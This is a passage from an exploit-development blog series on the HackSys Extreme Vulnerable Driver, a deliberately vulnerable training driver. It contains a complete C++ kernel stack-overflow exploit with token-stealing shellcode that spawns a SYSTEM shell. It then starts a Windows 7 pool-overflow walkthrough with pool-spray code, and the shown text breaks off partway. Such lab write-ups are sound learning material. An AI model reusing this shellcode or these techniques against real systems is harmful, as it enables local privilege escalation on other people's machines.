Incrementing 4 bytes at a time I finally got a crash with a 0x830 buffer length where the last 4 bytes are 0BAD0B0B0.

Getting a Crash

After incrementing methodically from a buffer size of 0x800, and remember that this includes a 4 byte terminator string or else we’ll never stop copying into kernel space and BSOD the host, I finally got an exception that tried to execute code at 41414141 with a total buffer size of 0x830. (I also got an exception when I used a smaller buffer size of 0x82C but the address referenced was a NULL). In this buffer, I had 0x82C \x41 chars and then our terminator. So I figured our offset was going to be at 0x828 or 2088 in decimal, but just to make sure I used my pattern python script to get the exact offset.

root@kali:~# python3 pattern.py -c 2092 -cpp
char pattern[] = 
"0Aa0Ab0Ac0Ad0Ae0Af0Ag0Ah0Ai0Aj0Ak0Al0Am0An0Ao0Ap0Aq0Ar0As0At0Au0Av0Aw0Ax0Ay0Az"
"0A00A10A20A30A40A50A60A70A80A90AA0AB0AC0AD0AE0AF0AG0AH0AI0AJ0AK0AL0AM0AN0AO0AP"
"0AQ0AR0AS0AT0AU0AV0AW0AX0AY0AZ0Ba0Bb0Bc0Bd0Be0Bf0Bg0Bh0Bi0Bj0Bk0Bl0Bm0Bn0Bo0Bp"
"0Bq0Br0Bs0Bt0Bu0Bv0Bw0Bx0By0Bz0B00B10B20B30B40B50B60B70B80B90BA0BB0BC0BD0BE0BF"
"0BG0BH0BI0BJ0BK0BL0BM0BN0BO0BP0BQ0BR0BS0BT0BU0BV0BW0BX0BY0BZ0Ca0Cb0Cc0Cd0Ce0Cf"
"0Cg0Ch0Ci0Cj0Ck0Cl0Cm0Cn0Co0Cp0Cq0Cr0Cs0Ct0Cu0Cv0Cw0Cx0Cy0Cz0C00C10C20C30C40C5"
"0C60C70C80C90CA0CB0CC0CD0CE0CF0CG0CH0CI0CJ0CK0CL0CM0CN0CO0CP0CQ0CR0CS0CT0CU0CV"
"0CW0CX0CY0CZ0Da0Db0Dc0Dd0De0Df0Dg0Dh0Di0Dj0Dk0Dl0Dm0Dn0Do0Dp0Dq0Dr0Ds0Dt0Du0Dv"
"0Dw0Dx0Dy0Dz0D00D10D20D30D40D50D60D70D80D90DA0DB0DC0DD0DE0DF0DG0DH0DI0DJ0DK0DL"
"0DM0DN0DO0DP0DQ0DR0DS0DT0DU0DV0DW0DX0DY0DZ0Ea0Eb0Ec0Ed0Ee0Ef0Eg0Eh0Ei0Ej0Ek0El"
"0Em0En0Eo0Ep0Eq0Er0Es0Et0Eu0Ev0Ew0Ex0Ey0Ez0E00E10E20E30E40E50E60E70E80E90EA0EB"
"0EC0ED0EE0EF0EG0EH0EI0EJ0EK0EL0EM0EN0EO0EP0EQ0ER0ES0ET0EU0EV0EW0EX0EY0EZ0Fa0Fb"
"0Fc0Fd0Fe0Ff0Fg0Fh0Fi0Fj0Fk0Fl0Fm0Fn0Fo0Fp0Fq0Fr0Fs0Ft0Fu0Fv0Fw0Fx0Fy0Fz0F00F1"
"0F20F30F40F50F60F70F80F90FA0FB0FC0FD0FE0FF0FG0FH0FI0FJ0FK0FL0FM0FN0FO0FP0FQ0FR"
"0FS0FT0FU0FV0FW0FX0FY0FZ0Ga0Gb0Gc0Gd0Ge0Gf0Gg0Gh0Gi0Gj0Gk0Gl0Gm0Gn0Go0Gp0Gq0Gr"
"0Gs0Gt0Gu0Gv0Gw0Gx0Gy0Gz0G00G10G20G30G40G50G60G70G80G90GA0GB0GC0GD0GE0GF0GG0GH"
"0GI0GJ0GK0GL0GM0GN0GO0GP0GQ0GR0GS0GT0GU0GV0GW0GX0GY0GZ0Ha0Hb0Hc0Hd0He0Hf0Hg0Hh"
"0Hi0Hj0Hk0Hl0Hm0Hn0Ho0Hp0Hq0Hr0Hs0Ht0Hu0Hv0Hw0Hx0Hy0Hz0H00H10H20H30H40H50H60H7"
"0H80H90HA0HB0HC0HD0HE0HF0HG0HH0HI0HJ0HK0HL0HM0HN0HO0HP0HQ0HR0HS0HT0HU0HV0HW0HX"
"0HY0HZ0Ia0Ib0Ic0Id0Ie0If0Ig0Ih0Ii0Ij0Ik0Il0Im0In0Io0Ip0Iq0Ir0Is0It0Iu0Iv0Iw0Ix"
"0Iy0Iz0I00I10I20I30I40I50I60I70I80I90IA0IB0IC0ID0IE0IF0IG0IH0II0IJ0IK0IL0IM0IN"
"0IO0IP0IQ0IR0IS0IT0IU0IV0IW0IX0IY0IZ0Ja0Jb0Jc0Jd0Je0Jf0Jg0Jh0Ji0Jj0Jk0Jl0Jm0Jn"
"0Jo0Jp0Jq0Jr0Js0Jt0Ju0Jv0Jw0Jx0Jy0Jz0J00J10J20J30J40J50J60J70J80J90JA0JB0JC0JD"
"0JE0JF0JG0JH0JI0JJ0JK0JL0JM0JN0JO0JP0JQ0JR0JS0JT0JU0JV0JW0JX0JY0JZ0Ka0Kb0Kc0Kd"
"0Ke0Kf0Kg0Kh0Ki0Kj0Kk0Kl0Km0Kn0Ko0Kp0Kq0Kr0Ks0Kt0Ku0Kv0Kw0Kx0Ky0Kz0K00K10K20K3"
"0K40K50K60K70K80K90KA0KB0KC0KD0KE0KF0KG0KH0KI0KJ0KK0KL0KM0KN0KO0KP0KQ0KR0KS0KT"
"0KU0KV0KW0KX0KY0KZ0La0Lb0Lc0Ld0Le0Lf0Lg0Lh0Li0Lj0Lk0Ll0Lm0Ln0Lo0";

I then added the terminator to the end like so.

---SNIP---
...Lm0Ln0Lo0\xb0\xb0\xd0\xba";

And we see I got an access violation at 306f4c30.

Using pattern again, I got the exact offset and we confirmed our suspicions.

root@kali:~# python3 pattern.py -o 306f4c30
Exact offset found at position: 2088
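For readers without the tool, the lookup can be reproduced with a short sketch. This is not the author's pattern.py. It is a hypothetical reimplementation that mimics the layout visible in the output above (a digit, an uppercase letter, then a character cycling through lowercase, digits and uppercase), and it assumes the crash address holds four pattern bytes in little-endian order:

```python
import string

# Third character of each triple cycles a-z, then 0-9, then A-Z.
THIRD = string.ascii_lowercase + string.digits + string.ascii_uppercase

def pattern_create(length):
    """Build a cyclic pattern of triples such as 0Aa, 0Ab, ... cut to `length`."""
    triples = []
    for digit in string.digits:
        for upper in string.ascii_uppercase:
            for third in THIRD:
                triples.append(digit + upper + third)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]

def pattern_offset(address, length=8192):
    """Find where the 4 bytes of a little-endian crash address sit in the pattern."""
    needle = address.to_bytes(4, "little").decode("ascii")
    return pattern_create(length).find(needle)

if __name__ == "__main__":
    print(pattern_create(2092)[-10:])
    print(pattern_offset(0x306f4c30))
```

The address 306f4c30 is just the bytes 30 4c 6f 30 reversed, which is the text 0Lo0, the last four characters of the 2092 byte pattern.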

From here on out, this plays out just like the stack buffer overflow post, so please reference those posts if you have any questions! We initialize our shellcode, create a RWX buffer for it, move it there, and then use the address of the buffer to overwrite eip at that offset we found.
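The resulting buffer layout is easy to sanity-check outside of the exploit. A minimal sketch of the layout in Python, where the address passed in is a placeholder rather than a real allocation and the function name is made up for the example:

```python
import struct

OFFSET = 0x828           # offset found with the pattern (2088)
TERMINATOR = 0xBAD0B0B0  # value that stops the driver's copy loop

def build_buffer(shellcode_address):
    """Filler up to the offset, then the overwrite address, then the terminator."""
    return (b"\x41" * OFFSET
            + struct.pack("<I", shellcode_address)  # lands on the saved return address
            + struct.pack("<I", TERMINATOR))        # ends the copy right after it

if __name__ == "__main__":
    buf = build_buffer(0x00230000)  # placeholder address for illustration only
    print(hex(len(buf)), buf[-8:].hex())
```

The total comes to 0x830 bytes, matching the buffer size that first produced the crash.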

Final Code

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    char shellcode[] = (
        "\x60"
        "\x64\xA1\x24\x01\x00\x00"
        "\x8B\x40\x50"
        "\x89\xC1"
        "\x8B\x98\xF8\x00\x00\x00"
        "\xBA\x04\x00\x00\x00"
        "\x8B\x80\xB8\x00\x00\x00"
        "\x2D\xB8\x00\x00\x00"
        "\x39\x90\xB4\x00\x00\x00"
        "\x75\xED"
        "\x8B\x90\xF8\x00\x00\x00"
        "\x89\x91\xF8\x00\x00\x00"
        "\x61"
        "\x5d"
        "\xc2\x08\x00"
        );

    LPVOID shellcode_address = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_address, shellcode, sizeof(shellcode));

    cout << "[>] RWX shellcode allocated at: " << hex << shellcode_address
        << "\n";

    BYTE input_buff[0x830] = { 0 };

    // 'A' * 0x828
    memset(input_buff, '\x41', 0x828);

    memcpy(input_buff + 0x828, &shellcode_address, 0x4);

    BYTE terminator[] = "\xb0\xb0\xd0\xba";

    memcpy(input_buff + 0x82c, &terminator, 0x4);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

void spawn_shell()
{
    PROCESS_INFORMATION Process_Info;
    ZeroMemory(&Process_Info, 
        sizeof(Process_Info));
    
    STARTUPINFOA Startup_Info;
    ZeroMemory(&Startup_Info, 
        sizeof(Startup_Info));
    
    Startup_Info.cb = sizeof(Startup_Info);

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL, 
        NULL, 
        NULL, 
        0, 
        CREATE_NEW_CONSOLE, 
        NULL, 
        NULL, 
        &Startup_Info, 
        &Process_Info);
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);

    spawn_shell();
}

Conclusion

This should net you a system shell.

HEVD Exploits – Windows 7 x86 Non-Paged Pool Overflow

By: h0mbre
22 April 2020 at 04:00

Introduction

I’m continuing on with my goal of developing exploits for the HackSys Extreme Vulnerable Driver (HEVD). I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from the strategies I saw employed in those blog posts, either out of necessity or because I wanted to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc.,
  • how to install HEVD,
  • how to set up a lab environment,
  • shellcode analysis.

The reason for this is simple: the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even sillier by shoddily explaining these things at a high level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, so I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

This exploit required a lot of insight into the non-paged pool internals of Windows 7. The walkthroughs and blog posts I relied on were extremely well written and made everything very logical and clear. I really appreciate the authors’ help! Again, I’m just recreating other people’s exploits in this series trying to learn, not inventing new ways to exploit pool overflows on 32-bit Windows 7. The exploit also required allocating the NULL page, which isn’t possible on x64, so this will be a 32-bit exploit only.

Reversing Relevant Function

The bug in this driver routine is really similar to some of the stack-based vulnerabilities we’ve already covered, like the stack overflow and the integer overflow. We send a user buffer to the routine, which allocates a kernel buffer and copies our user buffer into it. The only difference here is the type of memory used. Instead of the stack, this memory is allocated in the non-paged pool, whose chunks are guaranteed to be in physical memory (RAM) at all times and cannot be paged out. This stands in contrast to the paged pool, which is allowed to be “paged out” to a secondary storage medium when RAM runs short.

The APIs that are relevant in this routine are ExAllocatePoolWithTag and ExFreePoolWithTag. The prototype for ExAllocatePoolWithTag looks like this:

PVOID ExAllocatePoolWithTag(
  __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  SIZE_T                                         NumberOfBytes,
  ULONG                                          Tag
);

In our routine all of these parameters are hardcoded for us. PoolType is set to NonPagedPool, NumberOfBytes is set to 0x1F8, and Tag is set to 0x6B636148 (‘Hack’). This by itself is fine and there is obviously no vulnerability; however, the driver routine uses memcpy to transfer data from the user buffer to this newly allocated non-paged pool kernel buffer and uses the size of the user buffer as the size argument. (This is precisely the bug in the Jungo driver that @steventseeley discovered via fuzzing.) If our user buffer is larger than the kernel buffer, we will overwrite data in the adjacent non-paged pool allocation. Here is a screenshot of the function in IDA Free 7.0.

Nothing too complicated reversing-wise; we can even see that right after our pool buffer is allocated, it is de-allocated with ExFreePoolWithTag.
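To make the bug pattern concrete, here is a minimal user-mode sketch of it. This is a toy model and not the driver's code: the flat `pool` vector, the constants, and the function name `simulate_unchecked_copy` are all assumptions made for illustration. It places a 0x200-byte chunk (8-byte header plus 0x1F8-byte buffer) in front of a 0x40-byte neighbor and copies with the caller-supplied length, just like the memcpy described above.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical layout: [8-byte header][0x1F8-byte buffer][0x40-byte neighbor].
constexpr std::size_t kHeaderSize = 0x8;
constexpr std::size_t kBufferSize = 0x1F8;
constexpr std::size_t kNeighborSize = 0x40;

// Copies user_len bytes into the 0x1F8-byte buffer without comparing the
// length against the buffer size, then reports how many neighbor bytes
// were overwritten.
std::size_t simulate_unchecked_copy(std::size_t user_len) {
    std::vector<std::uint8_t> pool(kHeaderSize + kBufferSize + kNeighborSize, 0x00);

    // Keep the model itself memory-safe: the copy must stay inside the toy pool.
    assert(user_len <= kBufferSize + kNeighborSize);

    std::vector<std::uint8_t> user(user_len, 0x42);
    if (user_len > 0) {
        std::memcpy(pool.data() + kHeaderSize, user.data(), user_len);
    }

    std::size_t corrupted = 0;
    for (std::size_t i = kHeaderSize + kBufferSize; i < pool.size(); ++i) {
        if (pool[i] != 0x00) {
            ++corrupted;
        }
    }
    return corrupted;
}
```

With a length of 0x1F8 the neighbor is untouched; every byte past that lands in the adjacent allocation.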

If we call the function with the following skeleton code, we will see in WinDBG that everything works as normal and we can start trying to understand how the pool chunks are structured.

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F


HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    send_payload(hFile);

    return 0;
}

I set a breakpoint at offset 0x4D64, which is right after the memcpy operation, with this command in WinDBG: bp !HEVD+4D64. When it hits, we see that our pool buffer has been filled with our \x42 characters. At this point a pointer to the allocated kernel buffer is still in eax, so we can pass that address to the !pool command, which starts at the beginning of that page of memory and displays information about each allocation on the page.

kd> !pool 85246430
Pool page 85246430 region is Nonpaged pool
 85246000 size:   c8 previous size:    0  (Allocated)  Ntfx
 852460c8 size:   10 previous size:   c8  (Free)       .PZH
 852460d8 size:   20 previous size:   10  (Allocated)  ReTa
 852460f8 size:   20 previous size:   20  (Allocated)  ReTa
 85246118 size:   48 previous size:   20  (Allocated)  Vad 
 85246160 size:   68 previous size:   48  (Allocated)  NpFn Process: 8507a030
 852461c8 size:   20 previous size:   68  (Allocated)  ReTa
 852461e8 size:   20 previous size:   20  (Allocated)  ReTa
 85246208 size:  168 previous size:   20  (Free)       CcSc
 85246370 size:   b8 previous size:  168  (Allocated)  NbtD
*85246428 size:  200 previous size:   b8  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85246628 size:   20 previous size:  200  (Allocated)  ReTa
 85246648 size:   68 previous size:   20  (Allocated)  FMsl
 852466b0 size:   c8 previous size:   68  (Allocated)  Ntfx
 85246778 size:  180 previous size:   c8  (Free)       EtwG
 852468f8 size:   98 previous size:  180  (Allocated)  MmCa
 85246990 size:    8 previous size:   98  (Free)       Nb29
 85246998 size:   48 previous size:    8  (Allocated)  Vad 
 852469e0 size:  1b8 previous size:   48  (Allocated)  LSbf
 85246b98 size:   b8 previous size:  1b8  (Allocated)  File (Protected)
 85246c50 size:   60 previous size:   b8  (Free)       Clfs
 85246cb0 size:  1b0 previous size:   60  (Allocated)  NSIk
 85246e60 size:   20 previous size:  1b0  (Allocated)  ReTa
 85246e80 size:   b8 previous size:   20  (Allocated)  File (Protected)
 85246f38 size:   c8 previous size:   b8  (Allocated)  Ntfx

We see that even though our pointer in eax to our kernel buffer was 0x85246430, the allocation actually begins at 0x85246428, which is 0x8 bytes earlier. This is because an 8-byte pool header, made up of a 4-byte ULONG value and our 4-byte pool tag, is placed before our actual buffer begins. Using some of the WinDBG commands from the aforementioned blog posts goes a long way toward being able to think clearly about these data structures.

kd> dt nt!_POOL_HEADER 85246428
   +0x000 PreviousSize     : 0y000010111 (0x17)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001000000 (0x40)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4400017
   +0x004 PoolTag          : 0x6b636148
   +0x004 AllocatorBackTraceIndex : 0x6148
   +0x006 PoolTagHash      : 0x6b63

This shows us the makeup of the pool header. We can see it spans 8 total bytes, which we knew. The numbers that begin with 0y are binary. You can see that PreviousSize, PoolIndex, BlockSize, and PoolType all get their values smushed together to form the Ulong1 member, which begins at offset 0x000. Then, at offset 0x004, we get our pool tag. So that’s all 8 bytes accounted for. We can use the memory pane to scroll to the bottom of our buffer and spy on the next memory chunk’s header as well.

We can see that the header values for the next chunk are: 40 00 04 04 52 65 54 61.

The only other thing to pay attention to is that the !pool command told us our chunk was 0x200 bytes long, which makes sense when you add the 0x8-byte header to our allocated buffer size of 0x1F8.
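As a sanity check on the header fields, here is a small sketch that unpacks the 8 header bytes by hand. The struct and function names are my own, the 9/7/9/7 bit widths are read off the 0y binary values in the dt output, and treating the size fields as counts of 8-byte units is an assumption that happens to line up with the !pool output on this x86 target (0x40 * 8 = 0x200).

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Decoded view of an 8-byte x86 pool header (hypothetical helper type).
struct PoolHeader {
    std::uint32_t previous_size;  // in 8-byte units
    std::uint32_t pool_index;
    std::uint32_t block_size;     // in 8-byte units
    std::uint32_t pool_type;
    std::string   tag;            // the 4 raw tag bytes
};

// Converts a size field from 8-byte units to bytes.
constexpr std::uint32_t units_to_bytes(std::uint32_t units) {
    return units * 8;
}

// Unpacks Ulong1 (little-endian, first 4 bytes) and the pool tag (last 4 bytes).
PoolHeader decode_pool_header(const std::uint8_t* raw) {
    assert(raw != nullptr);

    const std::uint32_t ulong1 =
        static_cast<std::uint32_t>(raw[0]) |
        (static_cast<std::uint32_t>(raw[1]) << 8) |
        (static_cast<std::uint32_t>(raw[2]) << 16) |
        (static_cast<std::uint32_t>(raw[3]) << 24);

    PoolHeader header;
    header.previous_size = ulong1 & 0x1FF;          // bits 0-8
    header.pool_index    = (ulong1 >> 9) & 0x7F;    // bits 9-15
    header.block_size    = (ulong1 >> 16) & 0x1FF;  // bits 16-24
    header.pool_type     = (ulong1 >> 25) & 0x7F;   // bits 25-31
    header.tag.assign(reinterpret_cast<const char*>(raw + 4), 4);
    return header;
}
```

Feeding it the next chunk's bytes (40 00 04 04 52 65 54 61) gives a PreviousSize of 0x40 units, which is our 0x200-byte chunk, a BlockSize of 0x4 units (0x20 bytes), and the tag ReTa, matching the !pool listing.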

Generic Attack Strategy

Before we proceed, we have to understand how we’re going to utilize this ability, via our oversized user buffer, to arbitrarily overwrite data in the adjacent pool allocation as an attack vector. What we have right now is the ability to overwrite pool memory. In order for this to be worthwhile for us, we have to find a way to get the pool into a state where what we’re overwriting is predictable. If what we’re overwriting is unpredictable, we can never form a reliable exploit. If we damage some of the fields here and aren’t surgical in our overwrites, we’ll easily get a BSOD.

Generically, in its organic state, the non-paged pool is fragmented, meaning there are holes in it from chunks being freed arbitrarily by other processes on the system. What we want to do is cover these holes by spraying a ton of objects into the non-paged pool so that the pool allocation mechanism places our chunks into those available slots. Once this is complete, we’ll want to spray even more objects so that by far, the most common objects in the pool are the ones we have just sprayed.

By way of analogy, if you had a bag of a chess set’s pieces, you would have low odds of pulling a King from the bag; however, if you then added 15,000 Kings to the bag, your chances are much better!

So we have two goals outlined so far:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory.

What we’ll do next is take our pretty pool allocations that form a large solid block and poke holes in it the size of the kernel buffer we can allocate with the driver routine. Remember, our kernel buffer chunk is 0x200 bytes. This way, when our kernel buffer is allocated in the pool, the allocator will place it in the newly freed 0x200-byte hole we have just created. Now what we have is our allocation completely surrounded by the objects we had sprayed. This is perfect because now when our buffer overwrites data in the adjacent pool allocation, we’ll know exactly what we’re overwriting because it will be a chunk that we allocated ourselves, not one belonging to an arbitrary system process.

We will use this ability to predictably overwrite a piece of data in one of our allocated objects that will, once the allocation is freed, lead to the kernel calling a function pointer that we control and have pointed at our shellcode. So now our generic gameplan is:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory,
  • poke some nice 0x200 byte-sized holes in the allocations,
  • use our driver routine to fit our kernel buffer in one of these new holes,
  • have that allocation predictably overwrite information in the adjacent allocation that leads to kernel execution of our shellcode when the corrupted allocation is freed.
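The gameplan above can be rehearsed with a toy model before touching the real pool. Everything here is an assumption for illustration: each vector element stands for one 0x40-byte slot, allocation is a simple lowest-address first fit (the real Windows 7 allocator is more involved), and the function names are made up. The hole size of 8 slots is 0x200 / 0x40, and the 0x16 stride mirrors the spacing used later in this post.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Each slot stands for one 0x40-byte region of a toy non-paged pool.
enum class Slot { Free, Other, Event, Hack };

constexpr std::size_t kSlotsPerHole = 8;   // 0x200 / 0x40
constexpr std::size_t kHoleStride = 0x16;  // free 8 handles out of every 0x16

// Builds a pool whose first `busy` slots are fragmented (every third slot is
// a one-slot hole) and whose remaining slots are free.
std::vector<Slot> make_fragmented_pool(std::size_t total, std::size_t busy) {
    assert(busy <= total);
    std::vector<Slot> pool(total, Slot::Free);
    for (std::size_t i = 0; i < busy; ++i) {
        if (i % 3 != 0) pool[i] = Slot::Other;
    }
    return pool;
}

// Places up to `count` Event objects into the lowest free slots and returns
// their slot indices, which play the role of the saved handles.
std::vector<std::size_t> spray(std::vector<Slot>& pool, std::size_t count) {
    std::vector<std::size_t> handles;
    for (std::size_t i = 0; i < pool.size() && handles.size() < count; ++i) {
        if (pool[i] == Slot::Free) {
            pool[i] = Slot::Event;
            handles.push_back(i);
        }
    }
    return handles;
}

// Frees 8 consecutive sprayed objects at every stride of 0x16 handles.
void poke_holes(std::vector<Slot>& pool, const std::vector<std::size_t>& handles) {
    for (std::size_t i = 0; i + kSlotsPerHole <= handles.size(); i += kHoleStride) {
        for (std::size_t x = 0; x < kSlotsPerHole; ++x) {
            pool[handles[i + x]] = Slot::Free;
        }
    }
}

// First-fit allocation of a 0x200-byte chunk (8 free slots in a row).
// Returns the first slot index of the chunk, or -1 if nothing fits.
long allocate_hack(std::vector<Slot>& pool) {
    std::size_t run = 0;
    for (std::size_t i = 0; i < pool.size(); ++i) {
        run = (pool[i] == Slot::Free) ? run + 1 : 0;
        if (run == kSlotsPerHole) {
            const std::size_t start = i + 1 - kSlotsPerHole;
            for (std::size_t j = start; j <= i; ++j) pool[j] = Slot::Hack;
            return static_cast<long>(start);
        }
    }
    return -1;
}
```

In this model, once the small holes are plugged and the second spray has been perforated, the 0x200-byte allocation drops into the first hole and the slot right after it is one of our own Event objects, which is the property the real exploit depends on.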

Next, we’ll get to know the object we’ll be using to spray the pool.

Event Objects

The blogpost authors inform us that Event Objects are perfect for this job for a few reasons, but one of the main reasons is that each one takes up 0x40 bytes in the pool. A quick Python interpreter check shows us that we can neatly free 8 Event Objects and have the 0x200 byte-sized holes we wanted.

>>> 0x200 % 0x40
0
>>> 0x200 / 0x40
8.0

We don’t care much about the content of these events, so every parameter will be basically NULL when we use the CreateEvent API:

HANDLE CreateEventA(
  LPSECURITY_ATTRIBUTES lpEventAttributes,
  BOOL                  bManualReset,
  BOOL                  bInitialState,
  LPCSTR                lpName
);

What’s most important for us now is finding out what we need to overwrite in this object to get code execution when the corrupted Event Object is freed. We’ll go ahead and spray a similar number of objects to what FuzzySec and r0otki7 did:

  • 10,000 to fill the holes in the fragmented pool
  • 5,000 to create a nice long contiguous block of Event Objects

Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

Take note that we’re storing the handles to each Event Object in a vector so that we can access those later.

Let’s spray our objects, then allocate our kernel buffer, and see what the page our kernel buffer ends up on looks like. We still have the same breakpoint from before, right after the memcpy operation. Don’t forget that at this point the kernel buffer pointer is still in eax. I subtract 0x1000 from it, because that’s the small page size, and plug the result right into the !pool command to get that whole page’s allocation information:

kd> !pool 8628b008-0x1000
Pool page 8628a008 region is Nonpaged pool
*8628a000 size:   40 previous size:    0  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 8628a040 size:   80 previous size:   40  (Free)       b.2.
 8628a0c0 size:   40 previous size:   80  (Allocated)  Even (Protected)
 8628a100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a180 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a1c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a200 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a240 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a280 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a2c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a3c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a4c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
